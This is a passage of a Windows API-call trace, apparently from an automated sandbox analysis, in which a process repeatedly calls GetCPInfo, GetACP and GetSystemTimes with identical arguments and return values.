lpCPInfo=0x18fa10) returned 1 [0045.412] GetACP () returned 0x4e4 [0045.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.412] GetACP () returned 0x4e4 [0045.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.412] GetACP () returned 0x4e4 [0045.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.412] GetACP () returned 0x4e4 [0045.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.412] GetACP () returned 0x4e4 [0045.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.412] GetACP () returned 0x4e4 [0045.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.413] GetACP () returned 0x4e4 [0045.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.413] GetACP () returned 0x4e4 [0045.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.413] GetACP () returned 0x4e4 [0045.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.413] GetACP () returned 0x4e4 [0045.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.413] GetACP () returned 0x4e4 [0045.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.413] GetACP () returned 0x4e4 [0045.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.413] GetACP () returned 0x4e4 [0045.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.413] GetACP () returned 0x4e4 [0045.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.413] GetACP () returned 0x4e4 [0045.413] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.413] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.413] GetACP () returned 0x4e4 [0045.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.414] GetACP () returned 0x4e4 [0045.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.414] GetACP () returned 0x4e4 [0045.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.414] GetACP () returned 0x4e4 [0045.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.414] GetACP () returned 0x4e4 [0045.414] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.414] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.414] GetACP () returned 0x4e4 [0045.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.415] GetACP () returned 0x4e4 [0045.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.415] GetACP () returned 0x4e4 [0045.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.415] GetACP () returned 0x4e4 [0045.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.415] GetACP () returned 0x4e4 [0045.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.415] GetACP () returned 0x4e4 [0045.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.415] GetACP () returned 0x4e4 [0045.415] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.415] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.415] GetACP () returned 0x4e4 [0045.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.416] GetACP () returned 0x4e4 [0045.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.416] GetACP () returned 0x4e4 [0045.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.416] GetACP () returned 0x4e4 [0045.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.416] GetACP () returned 0x4e4 [0045.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.416] GetACP () returned 0x4e4 [0045.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.416] GetACP () returned 0x4e4 [0045.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.416] GetACP () returned 0x4e4 [0045.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.416] GetACP () returned 0x4e4 [0045.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.416] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.416] GetACP () returned 0x4e4 [0045.416] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.417] GetACP () returned 0x4e4 [0045.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.417] GetACP () returned 0x4e4 [0045.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.417] GetACP () returned 0x4e4 [0045.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.417] GetACP () returned 0x4e4 [0045.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.417] GetACP () returned 0x4e4 [0045.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.417] GetACP () returned 0x4e4 [0045.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.417] GetACP () returned 0x4e4 [0045.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.417] GetACP () returned 0x4e4 [0045.417] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.417] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.493] GetACP () returned 0x4e4 [0045.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.494] GetACP () returned 0x4e4 [0045.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.494] GetACP () returned 0x4e4 [0045.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.494] GetACP () returned 0x4e4 [0045.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.494] GetACP () returned 0x4e4 [0045.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.494] GetACP () returned 0x4e4 [0045.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.494] GetACP () returned 0x4e4 [0045.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.494] GetACP () returned 0x4e4 [0045.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.494] GetACP () returned 0x4e4 [0045.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.494] GetACP () returned 0x4e4 [0045.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.495] GetACP () returned 0x4e4 [0045.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.495] GetACP () returned 0x4e4 [0045.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.495] GetACP () returned 0x4e4 [0045.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.495] GetACP () returned 0x4e4 [0045.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.495] GetACP () returned 0x4e4 [0045.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.495] GetACP () returned 0x4e4 [0045.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.495] GetACP () returned 0x4e4 [0045.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.495] GetACP () returned 0x4e4 [0045.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.496] GetACP () returned 0x4e4 [0045.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.496] GetACP () returned 0x4e4 [0045.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.496] GetACP () returned 0x4e4 [0045.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.496] GetACP () returned 0x4e4 [0045.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.496] GetACP () returned 0x4e4 [0045.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.496] GetACP () returned 0x4e4 [0045.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.496] GetACP () returned 0x4e4 [0045.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.496] GetACP () returned 0x4e4 [0045.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.497] GetACP () returned 0x4e4 [0045.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.497] GetACP () returned 0x4e4 [0045.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.497] GetACP () returned 0x4e4 [0045.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.497] GetACP () returned 0x4e4 [0045.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.497] GetACP () returned 0x4e4 [0045.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.497] GetACP () returned 0x4e4 [0045.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | 